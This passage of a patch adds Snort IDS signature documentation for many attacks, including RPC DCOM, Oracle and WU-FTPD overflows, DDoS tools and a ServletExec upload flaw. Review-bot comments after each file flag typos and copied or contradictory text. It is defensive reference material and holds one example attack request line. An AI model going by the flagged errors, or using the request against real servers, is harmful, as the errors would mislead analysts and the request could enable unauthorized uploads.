+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
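Review bot: the Detailed Information says only that the product 'may allow an attacker to include code of their choosing due to the improper checking of user supplied input'; for a cross-site scripting rule the doc should name the script and parameter the rule matches so an analyst can confirm the hit. Additional References is empty although Affected Systems pins the issue to 'RSA Authentication Agent For Web 5.2', which implies a published advisory to cite. Style: 'code of the attackers choosing' wants the possessive 'attacker's', and Contributors says 'Sourcefire Vulnerability Research Team' where most of this patch writes 'Sourcefire Research Team'.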
--- /dev/null
+++ b/doc/signatures/122-3.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-3
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
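Review bot: the Summary says 'a tcp portsweep was detected' but the Detailed Information and Attack Scenarios then discuss only portscans; add one sentence distinguishing the two (sfPortscan reports a portsweep when one source probes the same port on many hosts, and a portscan when it probes many ports on one host), because that changes which hosts the analyst should treat as targets under Corrective Action. Spelling: 'reconnaisance' in Impact should be 'reconnaissance' and 'consititute' in Detailed Information should be 'constitute'. Impact's 'a targeted attack against the targeted systems' and Corrective Action's 'Apply any appropriate vendor supplied patches as appropriate' are redundant; 'a targeted attack against those systems' and 'Apply any appropriate vendor supplied patches' read better.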
--- /dev/null
+++ b/doc/signatures/230.txt
@@ -0,0 +1,59 @@
+Rule:
+--
+Sid:
+230
+
+--
+Summary:
+This event is generated when a DDoS Shaft client communicates with a Shaft handler.  It is also possible that this event may be generated when any host attempts to discover or detect a Shaft handler.
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft client or a host attempting to discover Shaft handlers.  If the listed destination IP is in your network, it may be a Shaft handler.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to direct them to launch attacks.  A client may communicate with a handler via TCP destination port 20432.
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft client needs to communicate with handlers to direct attacks.
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+A legitimate server port of 20432 will cause this rule to fire.  It may also create a false positive if port 20432 is selected as an FTP data port.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS254
+
+--
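Review bot: the False Positives entry ('A legitimate server port of 20432 will cause this rule to fire') implies the rule matches on the port alone, but the Summary and Detailed Information never say whether payload content is also required; state what the rule matches, since that determines whether an FTP data connection that happens to use port 20432 is really a false positive. The Detailed Information describes a 'tiered structure' but names only clients and handlers; mention the agents that handlers in turn direct, so the Impact advice about which role a local IP may hold is complete. Also 'The Shaft DDoS uses a tiered structure' reads as if DDoS were the tool's name; 'The Shaft DDoS tool' is clearer.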
--- /dev/null
+++ b/doc/signatures/564.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+564
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
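Review bot: the Additional References cite 'OpenNap Specification http://opennap.sourceforge.net/napster.txt', yet nothing in the text mentions OpenNap or Napster, so either the Detailed Information should say which response string the rule matches (if it is an OpenNap server reply, say so) or the reference belongs to a different file. The Summary repeats the generic 'a known response to a sucessful attack' without naming the response, which makes this entry indistinguishable from every other attack-responses doc. Spelling: 'sucessful' appears three times (Summary, and twice in Detailed Information) and should be 'successful'.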
--- /dev/null
+++ b/doc/signatures/1239.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1239
+
+--
+Summary:
+This event is generated when an attempt is made to execute the RFParalyze DoS
+exploit.
+
+--
+Impact:
+If the destination machine is vulnerable, it may start behaving
+unpredictably.  Succesful exploitation may lead to a full system crash 
+or may cause certain services to become unavailable.
+
+--
+Detailed Information:
+This signature triggers on execution of RFParalyze, an exploit written 
+in 2000 by Rain Forest Puppy.  It was based on a binary exploit called 
+"whisper", which was used in the wild at that time.  This exploit 
+performs a NetBIOS session request with a source host of NULL, which is 
+incorrectly handled by Windows 95/98 hosts.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+
+--
+Attack Scenarios:
+An attacker can crash critical machines, thereby
+preventing them from being accessed by legitimate clients.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+Potential future versions of this exploit, which may use
+different message strings, will not be detected by this rule.
+
+--
+Corrective Action: 
+Patches are not available from the vendor.
+
+Use a packet filtering firewall to block inbound traffic to port 139/TCP from
+all untrusted networks & hosts
+
+Upgrade critical machines to a more recent and supported version of the
+operating system.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
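Review bot: 'performs a NetBIOS session request with a source host of NULL' should name the field: a NetBIOS session request carries a called name and a calling name, and 'source host' presumably means the calling name, so say that explicitly so the description can be checked against a capture. Spelling: 'Succesful' in Impact should be 'Successful'. The Corrective Action line 'all untrusted networks & hosts' is missing its period and uses '&' where the rest of the patch spells out 'and'. 'Patches are not available from the vendor' is a strong claim for a bug from 2000; if it is still the documenter's understanding, cite the vendor statement, otherwise soften it.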
--- /dev/null
+++ b/doc/signatures/529.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+529
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of
+Service (DoS) attack against a host using the RFPoison tool.
+
+--
+Impact:
+Serious. Denial of Service.
+
+--
+Detailed Information:
+The Microsoft Local Security Authority (LSA) service does not handle
+certain malformed requests correctly. This service allows for the
+manipulation of user privileges on the host. A specially crafted
+malformed request sent to the LSA service will cause the system to
+become unresponsive.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation
+	Microsoft Windows NT Server
+	Microsoft Windows NT Terminal Server
+	
+--
+Attack Scenarios:
+An attacker can use the RFPoison tool against a host to generate the
+request necessary to cause the DoS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFP:
+http://www.wiretrip.net/rfp/txt/rfp9906.txt
+
+Microsoft:
+http://support.microsoft.com/support/kb/articles/Q231/4/57.asp
+
+--
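Review bot: the Detailed Information says 'A specially crafted malformed request sent to the LSA service will cause the system to become unresponsive' but never says over which transport or port the request arrives, so unlike the other Microsoft DoS entries in this patch no firewall mitigation can be offered under Corrective Action; add the port (and the SMB or RPC path by which LSA is reached) and the corresponding blocking advice. Affected Systems lists the NT products without service pack levels, although the Microsoft KB article cited would supply them, and the line after 'Microsoft Windows NT Terminal Server' is a stray tab. 'Upgrade to the latest non-affected version of the software' duplicates 'Apply the appropriate vendor supplied patches' for an operating-system bug; one of the two suffices.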
--- /dev/null
+++ b/doc/signatures/443.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+443
+
+--
+
+Summary:
+This event is generated when an ICMP Router Selection message is found on the network.
+
+--
+
+Impact:
+
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+Legitimate uses of ICMP Address Mask Requests exist.  Some hosts my implement this method as the final fall back option after static configuration and dynamic address mask configuration has failed.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
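Review bot: the Summary says the rule fires on an 'ICMP Router Selection message', but every later section describes ICMP Address Mask Requests: Detailed Information cites RFC 950 and address masks, Attack Scenarios and Ease of Attack talk about gathering subnet masks, and Corrective Action says 'ICMP Type 17 should be blocked', which is the Address Mask Request type (Router Solicitation is type 10). Either the Summary is wrong or the body was copied from the address-mask-request entry; fix whichever does not match the rule. The Impact section is empty. Spelling and grammar: 'determing' should be 'determining', 'correspoding' should be 'corresponding', 'Some hosts my implement' should be 'may implement', and 'configuration has failed' should agree with its plural subject ('have failed').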
--- /dev/null
+++ b/doc/signatures/3157.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3157
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
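Review bot: Attack Scenarios contradicts Detailed Information. Detailed Information says the overflow is triggered by "a malformed request to an RPC port", but Attack Scenarios describes "a request for a file with an overly long filename via a network share", which is a different vector and reads like text pasted from an SMB signature. Rewrite Attack Scenarios to describe a malformed DCOM request sent to an RPC endpoint, matching the rest of the document. Minor: "Expoit code exists" under Ease of Attack should be "Exploit"; and Additional References is empty even though Corrective Action says "Apply the appropriate vendor supplied patches", so the vendor bulletin those patches come from should be cited.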
--- /dev/null
+++ b/doc/signatures/1041.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1041
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
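Review bot: the Summary and Detailed Information never say which "potential weakness" in IIS this rule matches on, so a reader cannot judge the severity of the event or triage it; every other document in this patch names the request, file or parameter that triggers the signature, and this one should too. The Impact line "Information gathering possible administrator access." is missing the break between its two clauses ("Information gathering. Possible administrator access."). Additional References is empty.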
--- /dev/null
+++ b/doc/signatures/2787.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2787
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_online
+. This procedure is included in
+dbms_repcat_instantiate.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
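Review bot: Detailed Information has a line break in the middle of a sentence, leaving a line that begins with a full stop: "vulnerability in the procedure instantiate_online" followed by ". This procedure is included in". Rejoin it as "...in the procedure instantiate_online. This procedure is included in dbms_repcat_instantiate." Also "Oracle Oracle9i" under Affected Systems repeats the vendor name, the Corrective Action line is missing its full stop, and Additional References is empty although the text calls this a "known vulnerability" with a vendor patch, so the Oracle alert should be cited.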
--- /dev/null
+++ b/doc/signatures/1377.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a file
+globbing vulnerability associated with WU-FTPD.
+
+--
+Impact:
+Serious. Remote root access. A successful attack can allow remote
+execution of commands with privileges of WU-FTPD, most often root.
+
+--
+Detailed Information:
+An exploit in Washington University FTP daemon (WU-FTPD) code associated
+with file globbing can allow execution of arbitrary code with the
+privileges of WU-FTPD, typically root. WU-FTPD invokes the glob function
+when certain characters are used in a file name argument supplied by an
+FTP client. The glob function fails to properly handle illegal strings
+such as "~{" and "~[". The problem is compounded when the glob function
+returns an error condition that is incorrectly handled, which may lead
+to the corruption of process memory space. This exploit requires login
+access to a vulnerable server either via an anonymous or established
+user account.
+
+--
+Affected Systems:
+	WU-FTPD 2.6.1, 2.6.0, and 2.5.0.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WU-FTP server and enter a
+malformed file argument to gain access and execute arbitrary commands.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patch.
+
+Do not enable anonymous FTP access unless required.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/886083
+
+--
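Review bot: the first sentence of Detailed Information, "An exploit in Washington University FTP daemon (WU-FTPD) code associated with file globbing can allow execution of arbitrary code", uses "exploit" where it means "vulnerability"; suggest "A vulnerability in the file globbing code of ...". Attack Scenarios says "a vulnerable WU-FTP server" while the rest of the document says WU-FTPD; keep one name. Under Corrective Action the first line lacks a full stop, and the third line, "Do not enable anonymous FTP access unless required", deserves one more sentence: Detailed Information states the exploit "requires login access to a vulnerable server either via an anonymous or established user account", so disabling anonymous access is what removes the unauthenticated path.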
--- /dev/null
+++ b/doc/signatures/3246.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3246
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
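Review bot: this document is a word-for-word copy of the one for sid 3157 above, including the same "Expoit" typo under Ease of Attack and the same Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") that does not match the RPC DCOM overflow described in Detailed Information. If sids 3157 and 3246 detect different variants or different RPC interfaces, each document should say which; if they cover the same vulnerability, both files should at least carry the same corrected text. Additional References is empty here as well.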
--- /dev/null
+++ b/doc/signatures/1080.txt
@@ -0,0 +1,67 @@
+Rule:  
+--
+Sid:
+1080
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the Unify eWave 
+ServletExec uploader servlet, which may lead to a web server compromise.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Unify eWave ServletExec is a webserver-based JSP and Java Servlet
+environment available for many popular web servers (e.g., Apache, Netscape
+web server, and IIS).  Versions of ServletExec before 3.0E contain a
+vulnerability in UploadServlet that could allow an attacker to upload
+arbitrary files, including executables used to compromise the web server.
+
+--
+Affected Systems:
+Unify eWave ServletExec versions before 3.0E. 
+
+--
+Attack Scenarios:
+Attacker sends a simple HTTP GET or POST like the following:
+GET http://target/servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
+
+The attacker could upload any arbitrary file onto the web server, including
+executable code that can then be used to compromise the web server.
+
+--
+Ease of Attack:
+Relatively simple handcrafted HTTP GET or POST.
+
+--
+False Positives:
+It is possible that legitimate web administrators could use UploadServlet.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being done.  Try to
+determine if the request was by a legitimate web admin or not.
+Determine from the web server's configuration whether it was a threat or not
+(e.g., whether the web server even runs ServletExec, and if so whether
+it was running a vulnerable version).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
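Review bot: Corrective Action only tells the analyst how to triage the event and never states the fix, even though Detailed Information says the bug is in "Versions of ServletExec before 3.0E". Add "Upgrade ServletExec to 3.0E or later, or restrict access to UploadServlet to trusted administrators" ahead of the triage advice. Also "Original document author unkown" under Contributors should read "unknown", and the first line "Rule:  " carries trailing whitespace unlike the other files in this patch.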
--- /dev/null
+++ b/doc/signatures/2079.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2079
+
+--
+Summary:
+number for the rpc service lockd.
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service lockd.
+
+If a user connects to port 1024 being used by the rpc service lockd, a 
+denial of service can be issued by supplying random input to the 
+service. This is an attempt to ascertain whether or not that attack 
+could be successful.
+
+--
+Affected Systems:
+	Debian Linux 2.1, 2.2 pre potato and 2.2
+	MandrakeSoft Linux Mandrake 6.0, 6.1 and 7.0
+	RedHat Linux 6.0 sparc, i386 and alpha
+	RedHat Linux 6.1 sparc, i386 and alpha
+	RedHat Linux 6.2 sparc, i386 and alpha
+
+--
+Attack Scenarios:
+The attacker needs to send random data to port 1024 used by nlockmgr.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the system.
+
+Upgrade the software to the latest non vulnerable version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1372
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0508
+
+--
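Review bot: the Summary is truncated. It consists only of "number for the rpc service lockd.", the tail of a sentence whose beginning is missing; from Detailed Information it should read along the lines of "This event is generated when an attempt is made to obtain the port number for the rpc service lockd". Detailed Information and Attack Scenarios both say the probe goes to "port 1024", so the Summary should agree with that. Attack Scenarios also calls the service "nlockmgr" while the rest of the document says "lockd"; state once that these name the same service.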
--- /dev/null
+++ b/doc/signatures/401.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+401
+
+--
+
+Summary:
+This event is generated when An ICMP Network Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination network is not available. This could be an indication of routing problems on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
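Review bot: the Impact section describes when routers send this message rather than the impact of the event; since Corrective Action says "no corrective action is necessary", Impact should state plainly that the event is informational. Typos: "when An ICMP Network Unreachable" has a stray capital in the Summary, and "could indication routing problems" in Detailed Information should be "could indicate routing problems". There is no Affected Systems section, unlike the other signature documents in this patch.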
--- /dev/null
+++ b/doc/signatures/2723.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2723
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
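Review bot: the same mid-sentence line break as in the sid 2787 document: "vulnerability in the procedure add_priority_char" followed by ". This procedure is included in" should be one sentence ending "...add_priority_char. This procedure is included in dbms_repcat."; "Oracle Oracle9i" repeats the vendor name; the Corrective Action line lacks a full stop; Additional References is empty. Sids 2723, 2750, 2775 and 2787 share identical text apart from the procedure and package names, so consider generating them from one template and fixing it once.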
--- /dev/null
+++ b/doc/signatures/2750.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2750
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_mview_repsites
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
